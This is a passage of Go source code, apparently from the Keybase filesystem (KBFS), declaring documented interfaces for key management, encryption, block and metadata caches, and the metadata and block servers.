HasVerifyingKey(ctx context.Context, uid keybase1.UID, verifyingKey kbfscrypto.VerifyingKey, atServerTime time.Time) error // HasUnverifiedVerifyingKey returns nil if the given user has the given // unverified VerifyingKey, and an error otherwise. Note that any match // is with a key not verified to be currently connected to the user via // their sigchain. This is currently only used to verify finalized or // reset TLFs. Further note that unverified keys is a super set of // verified keys. HasUnverifiedVerifyingKey(ctx context.Context, uid keybase1.UID, verifyingKey kbfscrypto.VerifyingKey) error // GetCryptPublicKeys gets all of a user's crypt public keys (including // paper keys). GetCryptPublicKeys(ctx context.Context, uid keybase1.UID) ( []kbfscrypto.CryptPublicKey, error) // TODO: Split the methods below off into a separate // FavoriteOps interface. // FavoriteAdd adds folder to the list of the logged in user's // favorite folders. It is idempotent. FavoriteAdd(ctx context.Context, folder keybase1.Folder) error // FavoriteDelete deletes folder from the list of the logged in user's // favorite folders. It is idempotent. FavoriteDelete(ctx context.Context, folder keybase1.Folder) error // FavoriteList returns the list of all favorite folders for // the logged in user. FavoriteList(ctx context.Context) ([]keybase1.Folder, error) // Notify sends a filesystem notification. Notify(ctx context.Context, notification *keybase1.FSNotification) error } // KeyMetadata is an interface for something that holds key // information. This is usually implemented by RootMetadata. type KeyMetadata interface { // TlfID returns the ID of the TLF for which this object holds // key info. TlfID() tlf.ID // LatestKeyGeneration returns the most recent key generation // with key data in this object, or PublicKeyGen if this TLF // is public. LatestKeyGeneration() KeyGen // GetTlfHandle returns the handle for the TLF. It must not // return nil. // // TODO: Remove the need for this function in this interface, // so that BareRootMetadata can implement this interface // fully. GetTlfHandle() *TlfHandle // IsWriter checks that the given user is a valid writer of the TLF // right now. IsWriter( ctx context.Context, checker TeamMembershipChecker, uid keybase1.UID) ( bool, error) // HasKeyForUser returns whether or not the given user has // keys for at least one device. Returns an error if the TLF // is public. HasKeyForUser(user keybase1.UID) (bool, error) // GetTLFCryptKeyParams returns all the necessary info to // construct the TLF crypt key for the given key generation, // user, and device (identified by its crypt public key), or // false if not found. This returns an error if the TLF is // public. GetTLFCryptKeyParams( keyGen KeyGen, user keybase1.UID, key kbfscrypto.CryptPublicKey) ( kbfscrypto.TLFEphemeralPublicKey, EncryptedTLFCryptKeyClientHalf, TLFCryptKeyServerHalfID, bool, error) // StoresHistoricTLFCryptKeys returns whether or not history keys are // symmetrically encrypted; if not, they're encrypted per-device. StoresHistoricTLFCryptKeys() bool // GetHistoricTLFCryptKey attempts to symmetrically decrypt the key at the given // generation using the current generation's TLFCryptKey. GetHistoricTLFCryptKey(c cryptoPure, keyGen KeyGen, currentKey kbfscrypto.TLFCryptKey) ( kbfscrypto.TLFCryptKey, error) } type encryptionKeyGetter interface { // GetTLFCryptKeyForEncryption gets the crypt key to use for // encryption (i.e., with the latest key generation) for the // TLF with the given metadata. GetTLFCryptKeyForEncryption(ctx context.Context, kmd KeyMetadata) ( kbfscrypto.TLFCryptKey, error) } type mdDecryptionKeyGetter interface { // GetTLFCryptKeyForMDDecryption gets the crypt key to use for the // TLF with the given metadata to decrypt the private portion of // the metadata. It finds the appropriate key from mdWithKeys // (which in most cases is the same as mdToDecrypt) if it's not // already cached. GetTLFCryptKeyForMDDecryption(ctx context.Context, kmdToDecrypt, kmdWithKeys KeyMetadata) ( kbfscrypto.TLFCryptKey, error) } type blockDecryptionKeyGetter interface { // GetTLFCryptKeyForBlockDecryption gets the crypt key to use // for the TLF with the given metadata to decrypt the block // pointed to by the given pointer. GetTLFCryptKeyForBlockDecryption(ctx context.Context, kmd KeyMetadata, blockPtr BlockPointer) (kbfscrypto.TLFCryptKey, error) } type blockKeyGetter interface { encryptionKeyGetter blockDecryptionKeyGetter } // KeyManager fetches and constructs the keys needed for KBFS file // operations. type KeyManager interface { blockKeyGetter mdDecryptionKeyGetter // GetTLFCryptKeyOfAllGenerations gets the crypt keys of all generations // for current devices. keys contains crypt keys from all generations, in // order, starting from FirstValidKeyGen. GetTLFCryptKeyOfAllGenerations(ctx context.Context, kmd KeyMetadata) ( keys []kbfscrypto.TLFCryptKey, err error) // Rekey checks the given MD object, if it is a private TLF, // against the current set of device keys for all valid // readers and writers. If there are any new devices, it // updates all existing key generations to include the new // devices. If there are devices that have been removed, it // creates a new epoch of keys for the TLF. If there was an // error, or the RootMetadata wasn't changed, it returns false. // Otherwise, it returns true. If a new key generation is // added the second return value points to this new key. This // is to allow for caching of the TLF crypt key only after a // successful merged write of the metadata. Otherwise we could // prematurely pollute the key cache. // // If the given MD object is a public TLF, it simply updates // the TLF's handle with any newly-resolved writers. // // If promptPaper is set, prompts for any unlocked paper keys. // promptPaper shouldn't be set if md is for a public TLF. Rekey(ctx context.Context, md *RootMetadata, promptPaper bool) ( bool, *kbfscrypto.TLFCryptKey, error) } // Reporter exports events (asynchronously) to any number of sinks type Reporter interface { // ReportErr records that a given error happened. ReportErr(ctx context.Context, tlfName CanonicalTlfName, t tlf.Type, mode ErrorModeType, err error) // AllKnownErrors returns all errors known to this Reporter. AllKnownErrors() []ReportedError // Notify sends the given notification to any sink. Notify(ctx context.Context, notification *keybase1.FSNotification) // NotifySyncStatus sends the given path sync status to any sink. NotifySyncStatus(ctx context.Context, status *keybase1.FSPathSyncStatus) // Shutdown frees any resources allocated by a Reporter. Shutdown() } // MDCache gets and puts plaintext top-level metadata into the cache. type MDCache interface { // Get gets the metadata object associated with the given TLF ID, // revision number, and branch ID (NullBranchID for merged MD). Get(tlf tlf.ID, rev kbfsmd.Revision, bid BranchID) (ImmutableRootMetadata, error) // Put stores the metadata object. Put(md ImmutableRootMetadata) error // Delete removes the given metadata object from the cache if it exists. Delete(tlf tlf.ID, rev kbfsmd.Revision, bid BranchID) // Replace replaces the entry matching the md under the old branch // ID with the new one. If the old entry doesn't exist, this is // equivalent to a Put. Replace(newRmd ImmutableRootMetadata, oldBID BranchID) error } // KeyCache handles caching for both TLFCryptKeys and BlockCryptKeys. type KeyCache interface { // GetTLFCryptKey gets the crypt key for the given TLF. GetTLFCryptKey(tlf.ID, KeyGen) (kbfscrypto.TLFCryptKey, error) // PutTLFCryptKey stores the crypt key for the given TLF. PutTLFCryptKey(tlf.ID, KeyGen, kbfscrypto.TLFCryptKey) error } // BlockCacheLifetime denotes the lifetime of an entry in BlockCache. type BlockCacheLifetime int const ( // NoCacheEntry means that the entry will not be cached. NoCacheEntry BlockCacheLifetime = iota // TransientEntry means that the cache entry may be evicted at // any time. TransientEntry // PermanentEntry means that the cache entry must remain until // explicitly removed from the cache. PermanentEntry ) // BlockCacheSimple gets and puts plaintext dir blocks and file blocks into // a cache. These blocks are immutable and identified by their // content hash. type BlockCacheSimple interface { // Get gets the block associated with the given block ID. Get(ptr BlockPointer) (Block, error) // Put stores the final (content-addressable) block associated // with the given block ID. If lifetime is TransientEntry, // then it is assumed that the block exists on the server and // the entry may be evicted from the cache at any time. If // lifetime is PermanentEntry, then it is assumed that the // block doesn't exist on the server and must remain in the // cache until explicitly removed. As an intermediary state, // as when a block is being sent to the server, the block may // be put into the cache both with TransientEntry and // PermanentEntry -- these are two separate entries. This is // fine, since the block should be the same. Put(ptr BlockPointer, tlf tlf.ID, block Block, lifetime BlockCacheLifetime) error } // BlockCache specifies the interface of BlockCacheSimple, and also more // advanced and internal methods. type BlockCache interface { BlockCacheSimple // CheckForKnownPtr sees whether this cache has a transient // entry for the given file block, which must be a direct file // block containing data). Returns the full BlockPointer // associated with that ID, including key and data versions. // If no ID is known, return an uninitialized BlockPointer and // a nil error. CheckForKnownPtr(tlf tlf.ID, block *FileBlock) (BlockPointer, error) // DeleteTransient removes the transient entry for the given // pointer from the cache, as well as any cached IDs so the block // won't be reused. DeleteTransient(ptr BlockPointer, tlf tlf.ID) error // Delete removes the permanent entry for the non-dirty block // associated with the given block ID from the cache. No // error is returned if no block exists for the given ID. DeletePermanent(id kbfsblock.ID) error // DeleteKnownPtr removes the cached ID for the given file // block. It does not remove the block itself. DeleteKnownPtr(tlf tlf.ID, block *FileBlock) error // GetWithPrefetch retrieves a block from the cache, along with whether or // not it has triggered a prefetch. GetWithPrefetch(ptr BlockPointer) ( block Block, hasPrefetched bool, lifetime BlockCacheLifetime, err error) // PutWithPrefetch puts a block into the cache, along with whether or not // it has triggered a prefetch. PutWithPrefetch(ptr BlockPointer, tlf tlf.ID, block Block, lifetime BlockCacheLifetime, hasPrefetched bool) error // SetCleanBytesCapacity atomically sets clean bytes capacity for block // cache. SetCleanBytesCapacity(capacity uint64) // GetCleanBytesCapacity atomically gets clean bytes capacity for block // cache. GetCleanBytesCapacity() (capacity uint64) } // DirtyPermChan is a channel that gets closed when the holder has // permission to write. We are forced to define it as a type due to a // bug in mockgen that can't handle return values with a chan // struct{}. type DirtyPermChan <-chan struct{} // DirtyBlockCache gets and puts plaintext dir blocks and file blocks // into a cache, which have been modified by the application and not // yet committed on the KBFS servers. They are identified by a // (potentially random) ID that may not have any relationship with // their context, along with a Branch in case the same TLF is being // modified via multiple branches. Dirty blocks are never evicted, // they must be deleted explicitly. type DirtyBlockCache interface { // Get gets the block associated with the given block ID. Returns // the dirty block for the given ID, if one exists. Get(tlfID tlf.ID, ptr BlockPointer, branch BranchName) (Block, error) // Put stores a dirty block currently identified by the // given block pointer and branch name. Put(tlfID tlf.ID, ptr BlockPointer, branch BranchName, block Block) error // Delete removes the dirty block associated with the given block // pointer and branch from the cache. No error is returned if no // block exists for the given ID. Delete(tlfID tlf.ID, ptr BlockPointer, branch BranchName) error // IsDirty states whether or not the block associated with the // given block pointer and branch name is dirty in this cache. IsDirty(tlfID tlf.ID, ptr BlockPointer, branch BranchName) bool // IsAnyDirty returns whether there are any dirty blocks in the // cache. tlfID may be ignored. IsAnyDirty(tlfID tlf.ID) bool // RequestPermissionToDirty is called whenever a user wants to // write data to a file. The caller provides an estimated number // of bytes that will become dirty -- this is difficult to know // exactly without pre-fetching all the blocks involved, but in // practice we can just use the number of bytes sent in via the // Write. It returns a channel that blocks until the cache is // ready to receive more dirty data, at which point the channel is // closed. The user must call // `UpdateUnsyncedBytes(-estimatedDirtyBytes)` once it has // completed its write and called `UpdateUnsyncedBytes` for all // the exact dirty block sizes. RequestPermissionToDirty(ctx context.Context, tlfID tlf.ID, estimatedDirtyBytes int64) (DirtyPermChan, error) // UpdateUnsyncedBytes is called by a user, who has already been // granted permission to write, with the delta in block sizes that // were dirtied as part of the write. So for example, if a // newly-dirtied block of 20 bytes was extended by 5 bytes, they // should send 25. If on the next write (before any syncs), bytes // 10-15 of that same block were overwritten, they should send 0 // over the channel because there were no new bytes. If an // already-dirtied block is truncated, or if previously requested // bytes have now been updated more accurately in previous // requests, newUnsyncedBytes may be negative. wasSyncing should // be true if `BlockSyncStarted` has already been called for this // block. UpdateUnsyncedBytes(tlfID tlf.ID, newUnsyncedBytes int64, wasSyncing bool) // UpdateSyncingBytes is called when a particular block has // started syncing, or with a negative number when a block is no // longer syncing due to an error (and BlockSyncFinished will // never be called). UpdateSyncingBytes(tlfID tlf.ID, size int64) // BlockSyncFinished is called when a particular block has // finished syncing, though the overall sync might not yet be // complete. This lets the cache know it might be able to grant // more permission to writers. BlockSyncFinished(tlfID tlf.ID, size int64) // SyncFinished is called when a complete sync has completed and // its dirty blocks have been removed from the cache. This lets // the cache know it might be able to grant more permission to // writers. SyncFinished(tlfID tlf.ID, size int64) // ShouldForceSync returns true if the sync buffer is full enough // to force all callers to sync their data immediately. ShouldForceSync(tlfID tlf.ID) bool // Shutdown frees any resources associated with this instance. It // returns an error if there are any unsynced blocks. Shutdown() error } // DiskBlockCache caches blocks to the disk. type DiskBlockCache interface { // Get gets a block from the disk cache. Get(ctx context.Context, tlfID tlf.ID, blockID kbfsblock.ID) ( buf []byte, serverHalf kbfscrypto.BlockCryptKeyServerHalf, hasPrefetched bool, err error) // Put puts a block to the disk cache. Put(ctx context.Context, tlfID tlf.ID, blockID kbfsblock.ID, buf []byte, serverHalf kbfscrypto.BlockCryptKeyServerHalf) error // Delete deletes some blocks from the disk cache. Delete(ctx context.Context, blockIDs []kbfsblock.ID) (numRemoved int, sizeRemoved int64, err error) // UpdateMetadata updates the LRU time to Now() for a given block. UpdateMetadata(ctx context.Context, blockID kbfsblock.ID, hasPrefetched bool) error // Size returns the size in bytes of the disk cache. Size() int64 // Status returns the current status of the disk cache. Status() *DiskBlockCacheStatus // Shutdown cleanly shuts down the disk block cache. Shutdown(ctx context.Context) } // cryptoPure contains all methods of Crypto that don't depend on // implicit state, i.e. they're pure functions of the input. type cryptoPure interface { // MakeRandomTlfID generates a dir ID using a CSPRNG. MakeRandomTlfID(t tlf.Type) (tlf.ID, error) // MakeRandomBranchID generates a per-device branch ID using a // CSPRNG. It will not return LocalSquashBranchID or // NullBranchID. MakeRandomBranchID() (BranchID, error) // MakeMerkleHash computes the hash of a RootMetadataSigned object // for inclusion into the KBFS Merkle tree. MakeMerkleHash(md *RootMetadataSigned) (MerkleHash, error) // MakeTemporaryBlockID generates a temporary block ID using a // CSPRNG. This is used for indirect blocks before they're // committed to the server. MakeTemporaryBlockID() (kbfsblock.ID, error) // MakeRefNonce generates a block reference nonce using a // CSPRNG. This is used for distinguishing different references to // the same BlockID. MakeBlockRefNonce() (kbfsblock.RefNonce, error) // MakeRandomTLFEphemeralKeys generates ephemeral keys using a // CSPRNG for a TLF. These keys can then be used to key/rekey // the TLF. MakeRandomTLFEphemeralKeys() (kbfscrypto.TLFEphemeralPublicKey, kbfscrypto.TLFEphemeralPrivateKey, error) // MakeRandomTLFKeys generates keys using a CSPRNG for a // single key generation of a TLF. MakeRandomTLFKeys() (kbfscrypto.TLFPublicKey, kbfscrypto.TLFPrivateKey, kbfscrypto.TLFCryptKey, error) // MakeRandomTLFCryptKeyServerHalf generates the server-side of a // top-level folder crypt key. MakeRandomTLFCryptKeyServerHalf() ( kbfscrypto.TLFCryptKeyServerHalf, error) // MakeRandomBlockCryptKeyServerHalf generates the server-side of // a block crypt key. MakeRandomBlockCryptKeyServerHalf() ( kbfscrypto.BlockCryptKeyServerHalf, error) // EncryptTLFCryptKeyClientHalf encrypts a TLFCryptKeyClientHalf // using both a TLF's ephemeral private key and a device pubkey. EncryptTLFCryptKeyClientHalf( privateKey kbfscrypto.TLFEphemeralPrivateKey, publicKey kbfscrypto.CryptPublicKey, clientHalf kbfscrypto.TLFCryptKeyClientHalf) ( EncryptedTLFCryptKeyClientHalf, error) // EncryptPrivateMetadata encrypts a PrivateMetadata object. EncryptPrivateMetadata( pmd PrivateMetadata, key kbfscrypto.TLFCryptKey) ( EncryptedPrivateMetadata, error) // DecryptPrivateMetadata decrypts a PrivateMetadata object. DecryptPrivateMetadata( encryptedPMD EncryptedPrivateMetadata, key kbfscrypto.TLFCryptKey) (PrivateMetadata, error) // EncryptBlocks encrypts a block. plainSize is the size of the encoded // block; EncryptBlock() must guarantee that plainSize <= // len(encryptedBlock). EncryptBlock(block Block, key kbfscrypto.BlockCryptKey) ( plainSize int, encryptedBlock EncryptedBlock, err error) // DecryptBlock decrypts a block. Similar to EncryptBlock(), // DecryptBlock() must guarantee that (size of the decrypted // block) <= len(encryptedBlock). DecryptBlock(encryptedBlock EncryptedBlock, key kbfscrypto.BlockCryptKey, block Block) error // GetTLFCryptKeyServerHalfID creates a unique ID for this particular // kbfscrypto.TLFCryptKeyServerHalf. GetTLFCryptKeyServerHalfID( user keybase1.UID, devicePubKey kbfscrypto.CryptPublicKey, serverHalf kbfscrypto.TLFCryptKeyServerHalf) ( TLFCryptKeyServerHalfID, error) // VerifyTLFCryptKeyServerHalfID verifies the ID is the proper HMAC result. VerifyTLFCryptKeyServerHalfID(serverHalfID TLFCryptKeyServerHalfID, user keybase1.UID, devicePubKey kbfscrypto.CryptPublicKey, serverHalf kbfscrypto.TLFCryptKeyServerHalf) error // EncryptMerkleLeaf encrypts a Merkle leaf node with the TLFPublicKey. EncryptMerkleLeaf(leaf MerkleLeaf, pubKey kbfscrypto.TLFPublicKey, nonce *[24]byte, ePrivKey kbfscrypto.TLFEphemeralPrivateKey) ( EncryptedMerkleLeaf, error) // DecryptMerkleLeaf decrypts a Merkle leaf node with the TLFPrivateKey. DecryptMerkleLeaf(encryptedLeaf EncryptedMerkleLeaf, privKey kbfscrypto.TLFPrivateKey, nonce *[24]byte, ePubKey kbfscrypto.TLFEphemeralPublicKey) (*MerkleLeaf, error) // MakeTLFWriterKeyBundleID hashes a TLFWriterKeyBundleV3 to create an ID. MakeTLFWriterKeyBundleID(wkb TLFWriterKeyBundleV3) (TLFWriterKeyBundleID, error) // MakeTLFReaderKeyBundleID hashes a TLFReaderKeyBundleV3 to create an ID. MakeTLFReaderKeyBundleID(rkb TLFReaderKeyBundleV3) (TLFReaderKeyBundleID, error) // EncryptTLFCryptKeys encrypts an array of historic TLFCryptKeys. EncryptTLFCryptKeys(oldKeys []kbfscrypto.TLFCryptKey, key kbfscrypto.TLFCryptKey) (EncryptedTLFCryptKeys, error) // DecryptTLFCryptKeys decrypts an array of historic TLFCryptKeys. DecryptTLFCryptKeys( encKeys EncryptedTLFCryptKeys, key kbfscrypto.TLFCryptKey) ( []kbfscrypto.TLFCryptKey, error) } // Crypto signs, verifies, encrypts, and decrypts stuff. type Crypto interface { cryptoPure // Duplicate kbfscrypto.Signer here to work around gomock's // limitations. Sign(context.Context, []byte) (kbfscrypto.SignatureInfo, error) SignForKBFS(context.Context, []byte) (kbfscrypto.SignatureInfo, error) SignToString(context.Context, []byte) (string, error) // DecryptTLFCryptKeyClientHalf decrypts a // kbfscrypto.TLFCryptKeyClientHalf using the current device's // private key and the TLF's ephemeral public key. DecryptTLFCryptKeyClientHalf(ctx context.Context, publicKey kbfscrypto.TLFEphemeralPublicKey, encryptedClientHalf EncryptedTLFCryptKeyClientHalf) ( kbfscrypto.TLFCryptKeyClientHalf, error) // DecryptTLFCryptKeyClientHalfAny decrypts one of the // kbfscrypto.TLFCryptKeyClientHalf using the available // private keys and the ephemeral public key. If promptPaper // is true, the service will prompt the user for any unlocked // paper keys. DecryptTLFCryptKeyClientHalfAny(ctx context.Context, keys []EncryptedTLFCryptKeyClientAndEphemeral, promptPaper bool) ( kbfscrypto.TLFCryptKeyClientHalf, int, error) // Shutdown frees any resources associated with this instance. Shutdown() } // MDOps gets and puts root metadata to an MDServer. On a get, it // verifies the metadata is signed by the metadata's signing key. type MDOps interface { // GetForHandle returns the current metadata object // corresponding to the given top-level folder's handle and // merge status, if the logged-in user has read permission on // the folder. It creates the folder if one doesn't exist // yet, and the logged-in user has permission to do so. // // If there is no returned error, then the returned ID must // always be non-null. An empty ImmutableRootMetadata may be // returned, but if it is non-empty, then its ID must match // the returned ID. GetForHandle( ctx context.Context, handle *TlfHandle, mStatus MergeStatus) ( tlf.ID, ImmutableRootMetadata, error) // GetForTLF returns the current metadata object // corresponding to the given top-level folder, if the logged-in // user has read permission on the folder. GetForTLF(ctx context.Context, id tlf.ID) (ImmutableRootMetadata, error) // GetUnmergedForTLF is the same as the above but for unmerged // metadata. GetUnmergedForTLF(ctx context.Context, id tlf.ID, bid BranchID) ( ImmutableRootMetadata, error) // GetRange returns a range of metadata objects corresponding to // the passed revision numbers (inclusive). GetRange(ctx context.Context, id tlf.ID, start, stop kbfsmd.Revision) ( []ImmutableRootMetadata, error) // GetUnmergedRange is the same as the above but for unmerged // metadata history (inclusive). GetUnmergedRange(ctx context.Context, id tlf.ID, bid BranchID, start, stop kbfsmd.Revision) ([]ImmutableRootMetadata, error) // Put stores the metadata object for the given top-level folder. // This also adds the resulting ImmutableRootMetadata object to // the mdcache, if the Put is successful. Note that constructing // the ImmutableRootMetadata requires knowing the verifying key, // which might not be the same as the local user's verifying key // if the MD has been copied from a previous update. Put(ctx context.Context, rmd *RootMetadata, verifyingKey kbfscrypto.VerifyingKey) (ImmutableRootMetadata, error) // PutUnmerged is the same as the above but for unmerged metadata // history. This also adds the resulting ImmutableRootMetadata // object to the mdcache, if the PutUnmerged is successful. Note // that constructing the ImmutableRootMetadata requires knowing // the verifying key, which might not be the same as the local // user's verifying key if the MD has been copied from a previous // update. PutUnmerged(ctx context.Context, rmd *RootMetadata, verifyingKey kbfscrypto.VerifyingKey) (ImmutableRootMetadata, error) // PruneBranch prunes all unmerged history for the given TLF // branch. PruneBranch(ctx context.Context, id tlf.ID, bid BranchID) error // ResolveBranch prunes all unmerged history for the given TLF // branch, and also deletes any blocks in `blocksToDelete` that // are still in the local journal. In addition, it appends the // given MD to the journal. This also adds the resulting // ImmutableRootMetadata object to the mdcache, if the // ResolveBranch is successful. Note that constructing the // ImmutableRootMetadata requires knowing the verifying key, which // might not be the same as the local user's verifying key if the // MD has been copied from a previous update. ResolveBranch(ctx context.Context, id tlf.ID, bid BranchID, blocksToDelete []kbfsblock.ID, rmd *RootMetadata, verifyingKey kbfscrypto.VerifyingKey) (ImmutableRootMetadata, error) // GetLatestHandleForTLF returns the server's idea of the latest handle for the TLF, // which may not yet be reflected in the MD if the TLF hasn't been rekeyed since it // entered into a conflicting state. GetLatestHandleForTLF(ctx context.Context, id tlf.ID) ( tlf.Handle, error) } // KeyOps fetches server-side key halves from the key server. type KeyOps interface { // GetTLFCryptKeyServerHalf gets a server-side key half for a // device given the key half ID. GetTLFCryptKeyServerHalf(ctx context.Context, serverHalfID TLFCryptKeyServerHalfID, cryptPublicKey kbfscrypto.CryptPublicKey) ( kbfscrypto.TLFCryptKeyServerHalf, error) // PutTLFCryptKeyServerHalves stores a server-side key halves for a // set of users and devices. PutTLFCryptKeyServerHalves(ctx context.Context, keyServerHalves UserDeviceKeyServerHalves) error // DeleteTLFCryptKeyServerHalf deletes a server-side key half for a // device given the key half ID. DeleteTLFCryptKeyServerHalf(ctx context.Context, uid keybase1.UID, key kbfscrypto.CryptPublicKey, serverHalfID TLFCryptKeyServerHalfID) error } // Prefetcher is an interface to a block prefetcher. type Prefetcher interface { // PrefetchBlock directs the prefetcher to prefetch a block. PrefetchBlock(block Block, blockPtr BlockPointer, kmd KeyMetadata, priority int) error // PrefetchAfterBlockRetrieved allows the prefetcher to trigger prefetches // after a block has been retrieved. Whichever component is responsible for // retrieving blocks will call this method once it's done retrieving a // block. PrefetchAfterBlockRetrieved(b Block, blockPtr BlockPointer, kmd KeyMetadata) // Shutdown shuts down the prefetcher idempotently. Future calls to // the various Prefetch* methods will return io.EOF. The returned channel // allows upstream components to block until all pending prefetches are // complete. This feature is mainly used for testing, but also to toggle // the prefetcher on and off. Shutdown() <-chan struct{} } // BlockOps gets and puts data blocks to a BlockServer. It performs // the necessary crypto operations on each block. type BlockOps interface { // Get gets the block associated with the given block pointer // (which belongs to the TLF with the given key metadata), // decrypts it if necessary, and fills in the provided block // object with its contents, if the logged-in user has read // permission for that block. cacheLifetime controls the behavior of the // write-through cache once a Get completes. Get(ctx context.Context, kmd KeyMetadata, blockPtr BlockPointer, block Block, cacheLifetime BlockCacheLifetime) error // GetEncodedSize gets the encoded size of the block associated // with the given block pointer (which belongs to the TLF with the // given key metadata). GetEncodedSize(ctx context.Context, kmd KeyMetadata, blockPtr BlockPointer) (uint32, error) // Ready turns the given block (which belongs to the TLF with // the given key metadata) into encoded (and encrypted) data, // and calculates its ID and size, so that we can do a bunch // of block puts in parallel for every write. Ready() must // guarantee that plainSize <= readyBlockData.QuotaSize(). Ready(ctx context.Context, kmd KeyMetadata, block Block) ( id kbfsblock.ID, plainSize int, readyBlockData ReadyBlockData, err error) // Delete instructs the server to delete the given block references. // It returns the number of not-yet deleted references to // each block reference Delete(ctx context.Context, tlfID tlf.ID, ptrs []BlockPointer) ( liveCounts map[kbfsblock.ID]int, err error) // Archive instructs the server to mark the given block references // as "archived"; that is, they are not being used in the current // view of the folder, and shouldn't be served to anyone other // than folder writers. Archive(ctx context.Context, tlfID tlf.ID, ptrs []BlockPointer) error // TogglePrefetcher activates or deactivates the prefetcher. TogglePrefetcher(ctx context.Context, enable bool) error // BlockRetriever obtains the block retriever BlockRetriever() BlockRetriever // Prefetcher retrieves this BlockOps' Prefetcher. Prefetcher() Prefetcher // Shutdown shuts down all the workers performing Get operations Shutdown() } // Duplicate kbfscrypto.AuthTokenRefreshHandler here to work around // gomock's limitations. type authTokenRefreshHandler interface { RefreshAuthToken(context.Context) } // MDServer gets and puts metadata for each top-level directory. The // instantiation should be able to fetch session/user details via KBPKI. On a // put, the server is responsible for 1) ensuring the user has appropriate // permissions for whatever modifications were made; 2) ensuring that // LastModifyingWriter and LastModifyingUser are updated appropriately; and 3) // detecting conflicting writes based on the previous root block ID (i.e., when // it supports strict consistency). On a get, it verifies the logged-in user // has read permissions. // // TODO: Add interface for searching by time type MDServer interface { authTokenRefreshHandler // GetForHandle returns the current (signed/encrypted) metadata // object corresponding to the given top-level folder's handle, if // the logged-in user has read permission on the folder. It // creates the folder if one doesn't exist yet, and the logged-in // user has permission to do so. // // If there is no returned error, then the returned ID must // always be non-null. A nil *RootMetadataSigned may be // returned, but if it is non-nil, then its ID must match the // returned ID. GetForHandle(ctx context.Context, handle tlf.Handle, mStatus MergeStatus) (tlf.ID, *RootMetadataSigned, error) // GetForTLF returns the current (signed/encrypted) metadata object // corresponding to the given top-level folder, if the logged-in // user has read permission on the folder. GetForTLF(ctx context.Context, id tlf.ID, bid BranchID, mStatus MergeStatus) ( *RootMetadataSigned, error) // GetRange returns a range of (signed/encrypted) metadata objects // corresponding to the passed revision numbers (inclusive). GetRange(ctx context.Context, id tlf.ID, bid BranchID, mStatus MergeStatus, start, stop kbfsmd.Revision) ([]*RootMetadataSigned, error) // Put stores the (signed/encrypted) metadata object for the given // top-level folder. Note: If the unmerged bit is set in the metadata // block's flags bitmask it will be appended to the unmerged per-device // history. Put(ctx context.Context, rmds *RootMetadataSigned, extra ExtraMetadata) error // PruneBranch prunes all unmerged history for the given TLF branch. PruneBranch(ctx context.Context, id tlf.ID, bid BranchID) error // RegisterForUpdate tells the MD server to inform the caller when // there is a merged update with a revision number greater than // currHead, which did NOT originate from this same MD server // session. This method returns a chan which can receive only a // single error before it's closed. If the received err is nil, // then there is updated MD ready to fetch which didn't originate // locally; if it is non-nil, then the previous registration // cannot send the next notification (e.g., the connection to the // MD server may have failed). In either case, the caller must // re-register to get a new chan that can receive future update // notifications. RegisterForUpdate(ctx context.Context, id tlf.ID, currHead kbfsmd.Revision) (<-chan error, error) // CancelRegistration lets the local MDServer instance know that // we are no longer interested in updates for the specified // folder. It does not necessarily forward this cancellation to // remote servers. CancelRegistration(ctx context.Context, id tlf.ID) // CheckForRekeys initiates the rekey checking process on the // server. The server is allowed to delay this request, and so it // returns a channel for returning the error. Actual rekey // requests are expected to come in asynchronously. CheckForRekeys(ctx context.Context) <-chan error // TruncateLock attempts to take the history truncation lock for // this folder, for a TTL defined by the server. Returns true if // the lock was successfully taken. TruncateLock(ctx context.Context, id tlf.ID) (bool, error) // TruncateUnlock attempts to release the history truncation lock // for this folder. Returns true if the lock was successfully // released. TruncateUnlock(ctx context.Context, id tlf.ID) (bool, error) // DisableRekeyUpdatesForTesting disables processing rekey updates // received from the mdserver while testing. DisableRekeyUpdatesForTesting() // Shutdown is called to shutdown an MDServer connection. Shutdown() // IsConnected returns whether the MDServer is connected. IsConnected() bool // GetLatestHandleForTLF returns the server's idea of the latest handle for the TLF, // which may not yet be reflected in the MD if the TLF hasn't been rekeyed since it // entered into a conflicting state. For the highest level of confidence, the caller // should verify the mapping with a Merkle tree lookup. GetLatestHandleForTLF(ctx context.Context, id tlf.ID) ( tlf.Handle, error) // OffsetFromServerTime is the current estimate for how off our // local clock is from the mdserver clock. Add this to any // mdserver-provided timestamps to get the "local" time of the // corresponding event. If the returned bool is false, then we // don't have a current estimate for the offset. OffsetFromServerTime() (time.Duration, bool) // GetKeyBundles looks up the key bundles for the given key // bundle IDs. tlfID must be non-zero but either or both wkbID // and rkbID can be zero, in which case nil will be returned // for the respective bundle. If a bundle cannot be found, an // error is returned and nils are returned for both bundles. GetKeyBundles(ctx context.Context, tlfID tlf.ID, wkbID TLFWriterKeyBundleID, rkbID TLFReaderKeyBundleID) ( *TLFWriterKeyBundleV3, *TLFReaderKeyBundleV3, error) // CheckReachability is called when the Keybase service sends a notification // that network connectivity has changed. CheckReachability(ctx context.Context) // FastForwardBackoff fast forwards any existing backoff timer for // reconnects. If MD server is connected at the time this is called, it's // essentially a no-op. FastForwardBackoff() } type mdServerLocal interface { MDServer addNewAssertionForTest( uid keybase1.UID, newAssertion keybase1.SocialAssertion) error getCurrentMergedHeadRevision(ctx context.Context, id tlf.ID) ( rev kbfsmd.Revision, err error) isShutdown() bool copy(config mdServerLocalConfig) mdServerLocal } // BlockServer gets and puts opaque data blocks. The instantiation // should be able to fetch session/user details via KBPKI. On a // put/delete, the server is reponsible for: 1) checking that the ID // matches the hash of the buffer; and 2) enforcing writer quotas. type BlockServer interface { authTokenRefreshHandler // Get gets the (encrypted) block data associated with the given // block ID and context, uses the provided block key to decrypt // the block, and fills in the provided block object with its // contents, if the logged-in user has read permission for that // block. Get(ctx context.Context, tlfID tlf.ID, id kbfsblock.ID, context kbfsblock.Context) ( []byte, kbfscrypto.BlockCryptKeyServerHalf, error) // Put stores the (encrypted) block data under the given ID // and context on the server, along with the server half of // the block key. context should contain a kbfsblock.RefNonce // of zero. There will be an initial reference for this block // for the given context. // // Put should be idempotent, although it should also return an // error if, for a given ID, any of the other arguments differ // from previous Put calls with the same ID. // // If this returns a BServerErrorOverQuota, with Throttled=false, // the caller can treat it as informational and otherwise ignore // the error. Put(ctx context.Context, tlfID tlf.ID, id kbfsblock.ID, context kbfsblock.Context, buf []byte, serverHalf kbfscrypto.BlockCryptKeyServerHalf) error // PutAgain re-stores a previously deleted block under the same ID // with the same data. PutAgain(ctx context.Context, tlfID tlf.ID, id kbfsblock.ID, context kbfsblock.Context, buf []byte, 